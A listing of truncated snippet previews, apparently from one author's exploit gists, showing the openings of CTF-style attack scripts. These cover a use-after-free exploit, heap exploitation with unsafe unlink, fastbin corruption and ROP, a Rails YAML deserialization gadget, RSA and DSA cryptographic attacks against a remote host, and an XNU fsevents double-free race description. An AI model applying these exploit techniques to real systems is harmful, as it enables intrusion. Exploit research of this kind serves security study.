niklasb

#!/usr/bin/env python
#-*- coding: utf-8 -*-

from pwn import *
import re
import sys
import string
import itertools

# UAF in IndexCursor

niklasb

require 'yaml'
require 'base64'
require 'erb'

class ActiveSupport
  class Deprecation
    def initialize()
      @silenced = true
    end
    class DeprecatedInstanceVariableProxy

niklasb

from sage.all import continued_fraction, Integer, inverse_mod

pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777

niklasb

from sage.all import *
import base64

def factor(n,b):
    M=1
    print 'start'
    a = 2
    i=0
    for q in primes(b):
        i+=1

niklasb

from sage.all import continued_fraction, Integer, inverse_mod

pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777

niklasb

# First stage: unsafe unlink
# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption

from pwn import *
import struct
import sys

offset_close = 0x00000000000f78b0
offset_env = 0x3c6f38

niklasb

# Implementation based on attack from
# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf
import socket
import telnetlib
import random
from hashlib import sha1
from sage.all import inverse_mod, matrix, vector

TARGET = ('185.143.173.36', 1337)
sock=socket.create_connection(TARGET)

niklasb

The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0.

static int
fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx)
{
	fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data;
	int ret = 0;
	fsevent_dev_filter_args64 *devfilt_args, _devfilt_args;

	OSAddAtomic(1, &fseh->active);

niklasb

import time
# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py
from pwnlib.tools import *

TARGET=('localhost',5000)
INTERVAL=0

offset_free = 549184
offset_system = 0x456d0

niklasb

import socket
import telnetlib
import time
import struct
import sys

TARGET=('localhost', 1337)

offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0